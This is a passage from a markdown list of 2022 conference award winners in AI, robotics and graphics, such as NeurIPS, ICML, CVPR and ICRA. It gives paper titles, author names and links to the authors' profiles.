[Shaofeng Zou](https://scholar.google.com/citations?user=abUmi6QAAAAJ&hl=en) **14**- [Efficient Answer Enumeration in Description Logics with Functional Roles](https://arxiv.org/abs/2211.15248) [Carsten Lutz](https://scholar.google.de/citations?user=xcsp66oAAAAJ&hl=en), [Marcin Przybylko](https://www.researchgate.net/profile/Marcin-Przybylko-2) # Edit # CoRL 2022 (Auckland, New Zealand. December 14-18, 2022) **Best Paper:** **1**- [Training Robots to Evaluate Robots: Example-BasedInteractive Reward Functions for Policy Learning](https://arxiv.org/abs/2212.08961) [Kun Huang](https://scholar.google.com/citations?user=CSzbLwUAAAAJ&hl=en), [Edward S. Hu](https://scholar.google.com/citations?user=so6uzIwAAAAJ&hl=en), [Dinesh Jayaraman](https://scholar.google.com/citations?user=QxLpghAAAAAJ&hl=en) **Best System Paper:** **2**- [Legged Locomotion in Challenging Terrains using Egocentric Vision](https://arxiv.org/abs/2211.07638) [Ananye Agarwal](https://anag.me/), [Ashish Kumar](https://ashish-kmr.github.io/), [Jitendra Malik](https://scholar.google.co.jp/citations?user=aOklxsQAAAAJ&hl=ja), [Deepak Pathak](https://scholar.google.com/citations?user=AEsPCAUAAAAJ&hl=en) **Special Innovation Paper:** **3**- [Do As I Can, Not As I Say: Grounding Language in Robotic Affordances](https://arxiv.org/abs/2204.01691) [Michael Ahn](https://scholar.google.com/citations?user=xou_1u0AAAAJ&hl=en), [Anthony Brohan](https://www.researchgate.net/scientific-contributions/Anthony-Brohan-2174998459), [Noah Brown](https://scholar.google.com/citations?user=wHuVMCkAAAAJ&hl=en), [Yevgen Chebotar](https://scholar.google.com/citations?user=ADkiClQAAAAJ&hl=en), Omar Cortes, Byron David, [Chelsea Finn](https://scholar.google.com/citations?user=vfPE6hgAAAAJ&hl=en), [Chuyuan Fu](https://scholar.google.com/citations?user=bDq7MZMAAAAJ&hl=en), [Keerthana Gopalakrishnan](https://scholar.google.com/citations?user=uemlfQYAAAAJ), [Karol Hausman](https://scholar.google.com/citations?user=yy0UFOwAAAAJ&hl=en), [Alex Herzog](https://scholar.google.com/citations?user=jrfFYAIAAAAJ&hl=en), [Daniel Ho](https://scholar.google.com/citations?user=i05Kw5cAAAAJ&hl=en), [Jasmine Hsu](https://scholar.google.com/citations?user=WcXt6YQAAAAJ&hl=en), [Julian Ibarz](https://scholar.google.com/citations?user=l-la0GQAAAAJ&hl=en), [Brian Ichter](https://scholar.google.com/citations?user=-w5DuHgAAAAJ&hl=en), [Alex Irpan](https://scholar.google.com/citations?user=ZZNxNAYAAAAJ&hl=en), [Eric Jang](https://scholar.google.com/citations?user=Izhkp4YAAAAJ&hl=en), Rosario Jauregui Ruano, Kyle Jeffrey, Sally Jesmonth, [Nikhil J Joshi](https://scholar.google.com/citations?user=Cmf2HdcAAAAJ&hl=en), [Ryan Julian](https://scholar.google.com/citations?user=8C2_ZVsAAAAJ&hl=en), [Dmitry Kalashnikov](https://scholar.google.com/citations?user=2DBmo-wAAAAJ&hl=en), Yuheng Kuang, [Kuang-Huei Lee](https://scholar.google.com/citations?user=rE7-N30AAAAJ), [Sergey Levine](https://scholar.google.com/citations?user=8R35rCwAAAAJ&hl=en), Yao Lu, Linda Luu, [Carolina Parada](https://scholar.google.com/citations?user=X5nQcywAAAAJ&hl=en), [Peter Pastor](https://scholar.google.com/citations?user=_ws9LLgAAAAJ&hl=en), Jornell Quiambao, [Kanishka Rao](https://scholar.google.com/citations?user=wotfaAgAAAAJ&hl=en), Jarek Rettinghouse, Diego Reyes, [Pierre Sermanet](https://scholar.google.com/citations?user=0nPi5YYAAAAJ&hl=en), Nicolas Sievers, Clayton Tan, [Alexander Toshev](https://scholar.google.com/citations?user=T6PbwPIAAAAJ&hl=en), [Vincent Vanhoucke](https://scholar.google.com/citations?user=T7uctwYAAAAJ&hl=en), [Fei Xia](https://scholar.google.com/citations?user=pqP5_PgAAAAJ&hl=en), [Ted Xiao](https://scholar.google.com/citations?user=LIJQ_ZYAAAAJ&hl=en), Peng Xu, Sichun Xu, [Mengyuan Yan](https://scholar.google.com/citations?user=-S_9ZRcAAAAJ&hl=en), [Andy Zeng](https://scholar.google.com/citations?user=q7nFtUcAAAAJ&hl=en) # NeurIPS 2022 (New Orleans, USA. December 6-14, 2022) **Outstanding Paper:** **1**- [Is Out-of-distribution Detection Learnable?](https://arxiv.org/abs/2210.14707) [Zhen Fang](https://fang-zhen.github.io/index.html), Yixuan Li, [Jie Lu](https://scholar.google.com.au/citations?user=KKo7jCMAAAAJ&hl=en), [Jiahua Dong](https://scholar.google.com/citations?user=xrXqa8AAAAAJ&hl=zh-CN), [Bo Han](https://scholar.google.com/citations?hl=zh-CN&user=nTNjqHwAAAAJ), [Feng Liu](https://scholar.google.com/citations?user=eqe3JS8AAAAJ&hl=zh-CN) **3**- [Photorealistic Text-to-Image Diffusion Models with Deep Language Understanding](https://arxiv.org/abs/2205.11487) [Chitwan Saharia](https://scholar.google.co.in/citations?user=JApued4AAAAJ&hl=en), [William Chan](https://scholar.google.com/citations?user=Nla9qfUAAAAJ&hl=en), [Saurabh Saxena](https://scholar.google.com/citations?user=WTz38osAAAAJ&hl=en), Lala Li, [Jay Whang](https://scholar.google.com/citations?user=rBH-cpMAAAAJ&hl=en), [Emily Denton](https://scholar.google.com/citations?user=pcFsc-AAAAAJ&hl=en), [Seyed Kamyar Seyed Ghasemipour](https://scholar.google.ca/citations?user=LHvso9QAAAAJ&hl=en), Burcu Karagol Ayan, [S. Sara Mahdavi](https://scholar.google.com/citations?user=cA0ELoQAAAAJ&hl=en), [Rapha Gontijo Lopes](https://scholar.google.com/citations?user=-wpZQY0AAAAJ&hl=en), [Tim Salimans](https://scholar.google.nl/citations?user=w68-7AYAAAAJ&hl=en), [Jonathan Ho](https://scholar.google.com/citations?user=iVLAQysAAAAJ&hl=en), [David J Fleet](https://scholar.google.com/citations?user=njOmQFsAAAAJ), [Mohammad Norouzi](https://scholar.google.ca/citations?user=Lncr-VoAAAAJ&hl=en) **2**- [Elucidating the Design Space of Diffusion-Based Generative Models](https://arxiv.org/abs/2206.00364) [Tero Karras](https://www.semanticscholar.org/author/Tero-Karras/2976930), [Miika Aittala](https://scholar.google.com/citations?user=-_EKVQ0AAAAJ&hl=en), [Timo Aila](https://scholar.google.com/citations?user=e7abmgkAAAAJ&hl=en), [Samuli Laine](https://scholar.google.com/citations?user=UCXJOTUAAAAJ&hl=en) **3**- [ProcTHOR: Large-Scale Embodied AI Using Procedural Generation](https://arxiv.org/abs/2206.06994) [Matt Deitke](https://scholar.google.com/citations?user=k4VxCcYAAAAJ&hl=en), [Eli VanderBilt](https://scholar.google.com/citations?user=RQDywYwAAAAJ&hl=en), [Alvaro Herrasti](https://scholar.google.de/citations?user=89Knd5YAAAAJ&hl=en), [Luca Weihs](https://scholar.google.com/citations?user=F_RBceUAAAAJ&hl=en), [Jordi Salvador](https://scholar.google.de/citations?user=YuRVs2oAAAAJ&hl=en), [Kiana Ehsani](https://scholar.google.com/citations?user=RScZCLEAAAAJ&hl=en), Winson Han, [Eric Kolve](https://www.semanticscholar.org/author/Eric-Kolve/3386570), [Ali Farhadi](https://scholar.google.com/citations?user=jeOFRDsAAAAJ&hl=en), [Aniruddha Kembhavi](https://scholar.google.com/citations?user=JnUevM0AAAAJ&hl=en), [Roozbeh Mottaghi](https://scholar.google.com/citations?user=CCV58dgAAAAJ&hl=en) **4**- [Using natural language and program abstractions to instill human inductive biases in machines](https://arxiv.org/abs/2205.11558) [Sreejan Kumar](https://scholar.google.com/citations?user=Hft2m4wAAAAJ&hl=en), [Carlos G Correa](https://scholar.google.com/citations?user=_Lt_IHMAAAAJ&hl=en), [Ishita Dasgupta](https://scholar.google.com/citations?user=eJt6cSIAAAAJ&hl=en), [Raja Marjieh](https://scholar.google.com/citations?user=h-pwCMUAAAAJ&hl=en), [Michael Hu](https://scholar.google.com/citations?user=TyyftvAAAAAJ&hl=en), [Robert D. Hawkins](https://scholar.google.com/citations?user=7EPsnxEAAAAJ&hl=en), [Nathaniel D. Daw](https://scholar.google.com/citations?user=BxlScrEAAAAJ&hl=en), [Jonathan D. Cohen](https://scholar.google.com/citations?user=NCkkQAMAAAAJ&hl=en), [Karthik Narasimhan](https://scholar.google.com/citations?user=euc0GX4AAAAJ&hl=en), [Thomas L. Griffiths](https://scholar.google.com/citations?user=UAwKvEsAAAAJ&hl=en) **5**- [A Neural Corpus Indexer for Document Retrieval](https://arxiv.org/abs/2206.02743) [Yujing Wang](https://scholar.google.com/citations?user=YgL4rywAAAAJ&hl=en), Yingyan Hou, [Haonan Wang](https://scholar.google.com/citations?user=BP3l2RYAAAAJ&hl=en), Ziming Miao, [Shibin Wu](https://www.researchgate.net/profile/Shibin-Wu), [Hao Sun](https://scholar.google.com/citations?user=PaxAtLkAAAAJ&hl=en), [Qi Chen](https://scholar.google.com/citations?user=5e_o4XUAAAAJ&hl=en), Yuqing Xia, Chengmin Chi, [Guoshuai Zhao](https://scholar.google.com/citations?user=M1tGUAwAAAAJ&hl=zh-CN), Zheng Liu, [Xing Xie](https://scholar.google.com/citations?user=5EQfAFIAAAAJ&hl=en), Hao Allen Sun, Weiwei Deng, Qi Zhang, [Mao Yang](https://scholar.google.com/citations?user=LgJqohwAAAAJ&hl=en) **6**- [High-dimensional limit theorems for SGD: Effective dynamics and critical scaling](https://arxiv.org/abs/2206.04030) [Gerard Ben Arous](https://scholar.google.com/citations?user=8sGC5D4AAAAJ&hl=en), [Reza Gheissari](https://scholar.google.com/citations?user=IQbXmlgAAAAJ&hl=en), [Aukosh Jagannath](https://scholar.google.fr/citations?user=1gpz5TAAAAAJ&hl=en) **7**- [Gradient Descent: The Ultimate Optimizer](https://arxiv.org/abs/1909.13371) [Kartik Chandra](https://scholar.google.com/citations?user=oVcz4nIAAAAJ&hl=en), Audrey Xie, [Jonathan Ragan-Kelley](https://scholar.google.com/citations?user=nBcay4oAAAAJ&hl=en), [Erik Meijer](https://scholar.google.com/citations?user=odFMpOYAAAAJ&hl=en) **8**- [Riemannian Score-Based Generative Modelling](https://arxiv.org/abs/2202.02763) [Valentin De Bortoli](https://scholar.google.com/citations?user=dn_F9I4AAAAJ), [Emile Mathieu](https://scholar.google.com/citations?user=g9BjTqgAAAAJ), [Michael Hutchinson](https://scholar.google.com/citations?user=ot1m2GUAAAAJ&hl=en), [James Thornton](https://scholar.google.co.uk/citations?user=oFZHOwgAAAAJ&hl=en), [Yee Whye Teh](https://scholar.google.com/citations?user=y-nUzMwAAAAJ&hl=en), [Arnaud Doucet](https://scholar.google.com/citations?user=W4SZGV8AAAAJ&hl=en) **9**- [Gradient Estimation with Discrete Stein Operators](https://arxiv.org/abs/2202.09497) [Jiaxin Shi](https://scholar.google.com/citations?user=juZXbFoAAAAJ&hl=en), [Yuhao Zhou](https://scholar.google.com/citations?user=GKLRbxoAAAAJ&hl=en), Jessica Hwang, [Michalis K. Titsias](https://scholar.google.gr/citations?user=B-SbkAwAAAAJ&hl=el), [Lester Mackey](https://scholar.google.com/citations?user=erv7TP0AAAAJ&hl=en) **10**- [An empirical analysis of compute-optimal large language model training](https://arxiv.org/abs/2203.15556) [Jordan Hoffmann](https://scholar.google.com/citations?user=4A91qjAAAAAJ&hl=en), [Sebastian Borgeaud](https://scholar.google.co.uk/citations?user=-KzSL30AAAAJ&hl=en), [Arthur Mensch](https://scholar.google.fr/citations?user=F8riAN8AAAAJ&hl=fr), Elena Buchatskaya, [Trevor Cai](https://scholar.google.com/citations?user=li9aM1MAAAAJ), Eliza Rutherford, Diego de Las Casas, [Lisa Anne Hendricks](https://scholar.google.com/citations?user=pvyI8GkAAAAJ&hl=en), [Johannes Welbl](https://scholar.google.com/citations?user=SaHRjy4AAAAJ&hl=en), [Aidan Clark](https://scholar.google.com/citations?user=_19DrfIAAAAJ&hl=en), [Tom Hennigan](https://scholar.google.co.uk/citations?user=XnO_69oAAAAJ&hl=en), [Eric Noland](https://www.semanticscholar.org/author/Eric-Noland/51210148), [Katie Millican](https://scholar.google.com/citations?user=xJhN7QcAAAAJ&hl=en), [George van den Driessche](https://scholar.google.com/citations?user=2XfigMEAAAAJ&hl=en), Bogdan Damoc, [Aurelia Guy](https://www.researchgate.net/scientific-contributions/Aurelia-Guy-2209309561), [Simon Osindero](https://scholar.google.com/citations?user=Jq8ZS5kAAAAJ&hl=en), [Karen Simonyan](https://scholar.google.com/citations?user=L7lMQkQAAAAJ&hl=en), [Erich Elsen](https://scholar.google.com/citations?user=5d2Ss9EAAAAJ&hl=en), [Jack W. Rae](https://www.researchgate.net/scientific-contributions/Jack-W-Rae-2139424573), [Oriol Vinyals](https://scholar.google.com/citations?user=NkzyCvUAAAAJ&hl=en), [Laurent Sifre](https://scholar.google.com/citations?user=0kVh58wAAAAJ&hl=en) **11**- [Beyond neural scaling laws: beating power law scaling via data pruning](https://arxiv.org/abs/2206.14486) [Ben Sorscher](https://scholar.google.com/citations?user=v9-8fLEAAAAJ&hl=en), [Robert Geirhos](https://scholar.google.com/citations?user=w3kGtMIAAAAJ), [Shashank Shekhar](https://scholar.google.com/citations?user=UpV5wyYAAAAJ&hl=en), [Surya Ganguli](https://scholar.google.com/citations?user=rF2VvOgAAAAJ&hl=en), [Ari S. Morcos](https://scholar.google.com/citations?user=v-A_7UsAAAAJ&hl=en) **12**- [On-Demand Sampling: Learning Optimally from Multiple Distributions](https://arxiv.org/abs/2210.12529) [Nika Haghtalab](https://scholar.google.com/citations?user=C6pnolkAAAAJ&hl=en), [Michael I. Jordan](https://scholar.google.com/citations?user=yxUduqMAAAAJ&hl=en), [Eric Zhao](https://scholar.google.com/citations?user=TrxBpSYAAAAJ) **Datasets & Benchmarks Best Paper:** **1**- [LAION-5B: An open large-scale dataset for training next generation image-text models](https://arxiv.org/abs/2210.08402) Christoph Schuhmann, [Romain Beaumont](https://scholar.google.com/citations?user=jhtyYGAAAAAJ&hl=en), Richard Vencu, [Cade Gordon](https://scholar.google.com/citations?user=yma-bZUAAAAJ&hl=en), [Ross Wightman](https://scholar.google.com/citations?user=cLfKCzoAAAAJ&hl=en), [Mehdi Cherti](https://scholar.google.com/citations?user=JgOyYi8AAAAJ), Theo Coombes, Aarush Katta, Clayton Mullis, [Mitchell Wortsman](https://scholar.google.com/citations?user=fzRnjFgAAAAJ), [Patrick Schramowski](https://scholar.google.com/citations?user=GD481RkAAAAJ&hl=de), Srivatsa Kundurthy, Katherine Crowson, [Ludwig Schmidt](https://scholar.google.com/citations?user=SWMKy70AAAAJ&hl=en), [Robert Kaczmarczyk](https://www.researchgate.net/profile/Robert-Kaczmarczyk-2), [Jenia Jitsev](https://scholar.google.de/citations?user=p1FuAMkAAAAJ&hl=en) **2**- [MineDojo: Building Open-Ended Embodied Agents with Internet-Scale Knowledge](https://arxiv.org/abs/2206.08853) [Linxi Fan](https://scholar.google.com/citations?user=sljtWIUAAAAJ&hl=en), [Guanzhi Wang](https://scholar.google.com/citations?user=QDmEj4MAAAAJ), [Yunfan Jiang](https://scholar.google.com/citations?user=s8Epvl4AAAAJ), [Ajay Mandlekar](https://scholar.google.com/citations?user=MEz23joAAAAJ), [Yuncong Yang](https://scholar.google.com/citations?hl=en&user=IgQuUY0AAAAJ), [Haoyi Zhu](https://www.haoyizhu.site/), Andrew Tang, [De-An Huang](https://scholar.google.com/citations?user=HEY3UzgAAAAJ), [Yuke Zhu](https://scholar.google.com/citations?user=mWGyYMsAAAAJ&hl=en), [Anima Anandkumar](https://scholar.google.com/citations?user=bEcLezcAAAAJ&hl=en) **Test of Time:** **1**- [ImageNet Classification with Deep Convolutional Neural Networks](https://proceedings.neurips.cc/paper_files/paper/2012/file/c399862d3b9d6b76c8436e924a68c45b-Paper.pdf) [Alex Krizhevsky](https://scholar.google.com/citations?user=xegzhJcAAAAJ&hl=en), [Ilya Sutskever](https://scholar.google.com/citations?user=x04W_mMAAAAJ&hl=en), [Geoffrey Hinton](https://scholar.google.com/citations?user=JicYPdAAAAAJ) # Humanoids 2022 (Ginowan, Japan. November 28-30, 2022) **Best Oral Paper:** **1**- [A Fast, Autonomous, Bipedal Walking Behavior over Rapid Regions](https://arxiv.org/abs/2207.08312) Duncan Calvert, [Bhavyansh Mishra](https://scholar.google.com/citations?user=XzPu6zQAAAAJ), [Stephen McCrory](https://scholar.google.com/citations?user=L8ozqB8AAAAJ&hl=en), [Sylvain Bertrand](https://scholar.google.com/citations?user=t3jIVzcAAAAJ&hl=en), Robert Griffin, [Jerry Pratt](https://scholar.google.com/citations?user=NfeARS4AAAAJ&hl=en) **Best Interactive Paper:** **2**- [A Guideline for Humanoid Leg Design with Oblique Axes for Bipedal Locomotion](https://elib.dlr.de/192270/2/ICHR22_Fruend_Oblique_axes_Dez_copyright.pdf) Konrad Fründ, Anton Leonhard Shu, [Florian Christoph Loeffl](https://www.researchgate.net/scientific-contributions/Florian-Christoph-Loeffl-2120316963), [Christian Ott](https://scholar.google.de/citations?user=FOgCAxsAAAAJ&hl=en) # IROS 2022 (Kyoto, Japan. October 23-27, 2022) **Best Paper:** **1-** [SpeedFolding: Learning Efficient Bimanual Folding of Garments](https://arxiv.org/abs/2208.10552) [Yahav Avigal](https://scholar.google.com/citations?user=CCAaFCQAAAAJ), [Lars Berscheid](https://www.researchgate.net/scientific-contributions/Lars-Berscheid-2048462383), [Tamim Asfour](https://scholar.google.com/citations?user=65bIT4oAAAAJ&hl=en), [Torsten Kröger](https://scholar.google.com/citations?user=bfec5vAAAAAJ), [Ken Goldberg](https://scholar.google.com/citations?user=8fztli4AAAAJ&hl=en) **Best Student Paper:** **2**- [FAR Planner: Fast, Attemptable Route Planner using Dynamic Visibility Update](https://arxiv.org/abs/2110.09460) [Fan Yang](https://scholar.google.com/citations?user=t7p8nOQAAAAJ&hl=en), Chao Cao, Hongbiao Zhu, Jean Oh, Ji Zhang **Best Application Paper:** **3**- Soft Tissue Characterisation Using a Novel Robotic Medical Percussion Device with Acoustic Analysis and Neural Networks Pilar Zhang Qiu, Yongxuan Tan, Oliver Thompson, Bennet Cobley, and Thrishantha Nanayakkara **Best Cognitive Robotics Paper:** **4**- Gesture2Vec: Clustering Gestures using Representation Learning Methods for Co-speech Gesture Generation Payam Jome Yazdian, Mo Chen, and Angelica Lim **Best Mobile Manipulation Paper:** **5**- Robot Learning of Mobile Manipulation with Reachability Behavior Priors Snehal Jauhri, Jan Peters, and Georgia Chalvatzaki **Best Robot Mechanism and Design Paper:** **6**- Aerial Grasping and the Velocity Sufficiency Region Tony G. Chen, Kenneth Hoffmann, JunEn Low, Keiko Nagami, David Lentink, and Mark Cutkosky **Best RoboCup Paper:** **7**- RCareWorld: A Human-centric Simulation World for Caregiving Robots Ruolin Ye, Wenqiang Xu, Haoyuan Fu, Rajat Kumar, Jenamani, Vy Nguyen, Cewu Lu, Katherine Dimitropoulou, and Tapomayukh Bhattacharjee **8**- SpeedFolding: Learning Efficient Bimanual Folding of Garments Yahav Avigal, Lars Burscheid, Tamim Asfour, Torsten Kroeger, and Ken Goldberg **Best Entertainment and Amusement Paper:** **9**- Robot Learning to Paint from Demonstrations Younghyo Park, Seunghun Jeon, and Taeyoon Lee **Best Safety, Security, and Rescue Robotics Paper:** **10**- Power-based Safety Layer for Aerial Vehicles in Physical Interaction using Lyapunov Exponents Eugenio Cuniato, Nicholas Lawrance, Marco Tognon, and Roland Siegwart **Best Agri-Robotics Paper:** **11**- Explicitly Incorporating Spatial Information to Recurrent Networks for Agriculture Claus Smitt, Michael Allan Halstead, Alireza Ahmadi, and Christopher Steven McCool **Best Industrial Robotics Research for Applications:** **12**- Absolute Position Detection in 7-Phase Sensorless Electric Stepper Motor Vincent Groenhuis, Gijs Rolff, Koen Bosman, Leon Abelmann, and Stefano Stramigioli # SIGGRAPH 2022 (Vancouver, Canada. August 8-11, 2022) **Best Paper:** **1**- Image Features Influence Reaction Time: A Learned Probabilistic Perceptual Model for Saccade Latency Budmonde Duinkharjav, Praneeth Chakravarthula, Rachel Brown, Anjul Patney, Qi Sun **2**- CLIPasso: Semantically Aware Object Sketching Yael Vinker, Ehsan Pajouheshgar, Jessica Y. Bo, Roman Christian Bachmann, Amit Bermano, Daniel Cohen-Or, Amir Zamir, Ariel Shamir **3**- Instant Neural Graphics Primitives with a Multiresolution Hash Encoding Thomas Müller, Alex Evans, Christoph Schied, Alexander Keller **4**- Spelunking the Deep: Guaranteed Queries on General Neural Implicit Surfaces Nicholas Sharp, Alec Jacobson **5**- DeepPhase: Periodic Autoencoders for Learning Motion Phase Manifolds Sebastian Starke, Ian Mason, Taku Komura # ICML 2022 (Baltimore, USA. July 17-23, 2022) **Outstanding Paper:** **1**- Stable Conformal Prediction Sets Eugene Ndiaye **2**- G-Mixup: Graph Data Augmentation for Graph Classification Xiaotian Han, Zhimeng Jiang, Ninghao Liu, Xia Hu **3**- Learning Mixtures of Linear Dynamical Systems Yanxi Chen, H. Vincent Poor **4**- The Importance of Non-Markovianity in Maximum State Entropy Exploration Mirco Mutti, Riccardo De Santi, Marcello Restelli **5**- Do Differentiable Simulators Give Better Policy Gradients? Hyung Ju Suh, Max Simchowitz, Kaiqing Zhang, Russ Tedrake **6**- Causal Conceptions of Fairness and their Consequences Hamed Nilforoshan, Johann Gaebler, Ravi Shroff, Sharad Goel **7**- Solving Stackelberg Prediction Game with Least Squares Loss via Spherically Constrained Least Squares Reformulation Jiali Wang, Wen Huang, Rujun Jiang, Xudong Li, Alex Wang **8**- Privacy for Free: How does Dataset Condensation Help Privacy? Tian Dong, Bo Zhao, Lingjuan Lyu **9**- Bayesian Model Selection, the Marginal Likelihood, and Generalization Sanae Lotfi, Pavel Izmailov, Gregory Benton, Micah Goldblum, Andrew Wilson **10**- Understanding Dataset Difficulty with V-Usable Information Kawin Ethayarajh, Yejin Choi, Swabha Swayamdipta **Test of Time:** **11**- Poisoning Attacks Against Support Vector Machines Battista Biggio, Blaine Nelson, Pavel Laskov **Best Paper:** **1**- Iterative Residual Policy for Goal-Conditioned Dynamic Manipulation of Deformable Objects Cheng Chi, Benjamin CM Burchfiel, Eric Cousineau, Siyuan Feng, and Shuran Song **Best Student Paper:** **1**- AK: Attentive Kernel for Information Gathering Weizhe Chen, Roni Khardon, and Lantao Liu **Best Systems Paper:** **1**- Autonomously Untangling Long Cables Kaushik Shivakumar, Vainavi Viswanath, Justin Kerr, Brijen Thananjeyan, Ellen Novoseller, Jeffrey Ichnowski, Ken Goldberg, Joseph Gonzalez, Michael Laskey, and Alejandro Escontrela **Test of Time:** Sampling-based algorithms for optimal motion planning Sertac Karaman, Emilio Frazzoli # CVPR 2022 (New Orleans, USA. June 19-24, 2022) **Best Paper:** **1**- Learning to Solve Hard Minimal Problems Petr Hruby, Timothy Duff, Anton Leykin, Tomas Pajdla **Best Student Paper:** **1**- EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation Hansheng Chen, Pichao Wang, Fan Wang, Wei Tian, Lu Xiong, Hao Li **Best Paper Honorable Mention:** **1**- Dual-Shutter Optical Vibration Sensing Mark Sheinin, Dorian Chan, Matthew O'Toole, Srinivasa Narasimhan **Best Student Paper Honorable Mention:** **1**- Ref-NeRF: Structured View-Dependent Appearance for Neural Radiance Fields Dor Verbin, Peter Hedman, Ben Mildenhall, Todd Zickler, Jonathan Barron, Pratul Srinivasan # ICRA 2022 (Philadelphia, USA. May 23-27, 2022) **Outstanding Paper:** **1**- Translating Images into Maps Avishkar Saha, Oscar Alejandro Mendez Maldonado, Chris Russell, Richard Bowden **Outstanding Student Paper:** **1**- Interactive Robotic Grasping with Attribute-Guided Disambiguation Yang Yang, Xibai Lou, Changhyun Choi **Outstanding Automation Paper:** **1**- Precise 3D Reconstruction of Plants from UAV Imagery Combining Bundle Adjustment and Template Matching Elias Ariel Marks, Federico Magistri, Cyrill Stachniss **Outstanding Coordination Paper:** **1**- Decentralized Model Predictive Control for Equilibrium-based Collaborative UAV Bar Transportation Roberto Castro Sundin, Pedro Roque, Dimos V. Dimarogonas **Outstanding Deployed Systems Paper:** **1**- Autonomous Teamed Exploration of Subterranean Environments using Legged and Aerial Robots Mihir Kulkarni, Mihir Rahul Dharmadhikari, Marco Tranzatto, Samuel Zimmermann, Victor Reijgwart, Paolo De Petris, Huan Nguyen, Nikhil Vijay Khedekar, Christos Papachristos, Lionel Ott, Roland Siegwart, Marco Hutter, Kostas Alexis **Outstanding Dynamics and Control Paper:** **1**- Cooperative Modular Single Actuator Monocopters Capable of Controlled Passive Separation Xinyu Cai, Shane Kyi Hla Win, Luke Soe Thura Win, Danial Sufiyan, Shaohui Foong **Outstanding Interaction Paper:** **1**- Human-Robot Shared Control for Surgical Robot Based on Context-Aware Sim-to-Real Adaptation Dandan Zhang, Zicong Wu, Junhong Chen, Ruiqi Zhu, Adnan Munawar, Bo Xiao, Yuan Guan, Hang Su, Yao Guo, Gregory Scott Fischer, Benny Ping Lai Lo, Guang-Zhong Yang **Outstanding Learning Paper:** **1**- Augmenting Reinforcement Learning with Behavior Primitives for Diverse Manipulation Tasks Nasiriany, Soroush; Liu, Huihan; Zhu, Yuke Outstanding Locomotion Paper: Trajectory Optimization Formulation with Smooth Analytical Derivatives for Track-leg and Wheel-leg Ground Robots Adwait Mane, Dylan Swart, Jason White, Christian Hubicki Outstanding Manipulation Paper: Manipulation of unknown objects via contact configuration regulation Neel Doshi, Orion Taylor, Alberto Rodriguez Outstanding Mechanisms and Design Paper: Design of a Biomimetic Tactile Sensor for Material Classification Kevin Dai, Xinyu Wang, Allison M. Rojas, Evan Harber, Yu Tian, Nicholas Paiva, Joseph Gnehm, Evan Schindewolf, Howie Choset, Victoria Webster-Wood, Lu Li Outstanding Navigation Paper: EDPLVO: Efficient Direct Point-Line Visual Odometry Lipu Zhou, Guoquan (Paul) Huang, Yinian Mao, Shengze Wang, Michael Kaess Outstanding Planning Paper: Non-Gaussian Risk Bounded Trajectory Optimization for Stochastic Nonlinear Systems in Uncertain Environments Weiqiao Han, Ashkan M. Jasour, Brian Williams # ACL 2022 (Dublin, Ireland. May 22-27, 2022) Best Paper: Learned Incremental Representations for Parsing Nikita Kitaev, Thomas Lu, Dan Klein Best Special Theme Paper: Requirements and Motivations of Low-Resource Speech Synthesis for Language Revitalization Aidan Pine, Dan Wells, Nathan Brinklow, Patrick William Littell, Korin Richmond Best Resource Paper: DiBiMT: A Novel Benchmark for Measuring Word Sense Disambiguation Biases in Machine Translation Niccolò Campolungo, Federico Martelli, Francesco Saina, Roberto Navigli Best Linguistic Insight Paper: KinyaBERT: a Morphology-aware Kinyarwanda Language Model Antoine Nzeyimana, Andre Niyongabo Rubungo Outstanding Paper: ​ Evaluating Factuality in Text Simplification Ashwin Devaraj, William Berkeley Sheffield, Byron C. Wallace, Junyi Jessy Li Online Semantic Parsing for Latency Reduction in Task-Oriented Dialogue Jiawei Zhou, Jason Eisner, Michael Newman, Emmanouil Antonios Platanios, Sam Thomson Learning to Generalize to More: Continuous Semantic Augmentation for Neural Machine Translation Xiangpeng Wei, Heng Yu, Yue Hu, Rongxiang Weng, Weihua Luo, Rong Jin Fantastically Ordered Prompts and Where to Find Them: Overcoming Few-Shot Prompt Order Sensitivity Yao Lu, Max Bartolo, Alastair Moore, Sebastian Riedel, Pontus Stenetorp Inducing Positive Perspectives with Text Reframing Caleb Ziems, Minzhi Li, Anthony Zhang, Diyi Yang Ditch the Gold Standard: Re-evaluating Conversational Question Answering Huihan Li, Tianyu Gao, Manan Goenka, Danqi Chen Active Evaluation: Efficient NLG Evaluation with Few Pairwise Comparisons Akash Kumar Mohankumar, Mitesh M. Khapra Compression of Generative Pre-trained Language Models via Quantization Chaofan Tao, Lu Hou, Wei Zhang, Lifeng Shang, Xin Jiang, Qun Liu, Ping Luo, Ngai Wong # ICLR 2022 (Online. April 25-29, 2022) Outstanding Paper: Analytic-DPM: an Analytic Estimate of the Optimal Reverse Variance in Diffusion Probabilistic Models Fan Bao, Chongxuan Li, Jun Zhu, Bo Zhang Hyperparameter Tuning with Renyi Differential Privacy Nicolas Papernot, Thomas Steinke Learning Strides in Convolutional Neural Networks Rachid Riad, Olivier Teboul, David Grangier, Neil Zeghidour Expressiveness and Approximation Properties of Graph Neural Networks Floris Geerts, Juan L Reutter Comparing Distributions by Measuring Differences that Affect Decision Making Shengjia Zhao, Abhishek Sinha, Yutong (Kelly) He, Aidan Perreault, Jiaming Song, Stefano Ermon Neural Collapse Under MSE Loss: Proximity to and Dynamics on the Central Path X.Y. Han, Vardan Papyan, David L. Donoho Bootstrapped Meta-Learning Sebastian Flennerhag, Yannick Schroecker, Tom Zahavy, Hado van Hasselt, David Silver, Satinder Singh # AAAI 2022 (Online. February 22 - March 1, 2022) Outstanding Paper: Online certification of preference-based fairness for personalized recommendersystems Virginie Do, Sam Corbett-Davies, Jamal Atif, Nicolas Usunier Outstanding Student Paper: InfoLM: A New Metric to Evaluate Summarization & Data2Text Generation Pierre Colombo, Chloé Clavel, Pablo Piantanida Best Student Abstract: Annotation Cost-Sensitive Deep Active Learning with Limited Data Renaud Bernatchez, Audrey Durand and Flavie Lavoie-Cardinal Distinguished Paper: AlphaHoldem: High-Performance Artificial Intelligence for Heads-Up No-Limit Poker via End-to-End Reinforcement Learning Enmin Zhao, Renye Yan, Jinqiu Li, Kai Li, Junliang Xing Certified Symmetry and Dominance Breaking for Combinatorial Optimisation Bart Bogaerts, Stephan Gocht, Ciaran McCreesh, Jakob Nordström Online Elicitation of Necessarily Optimal Matchings Jannik Peters Sampling-Based Robust Control of Autonomous Systems with Non-Gaussian Noise Thom S. Badings, Alessandro Abate, Nils Jansen, David Parker, Hasan A. Poonawala, Marielle Stoelinga Subset approximation of Pareto Regions with Bi-objective A* Jorge A. Baier, Carlos 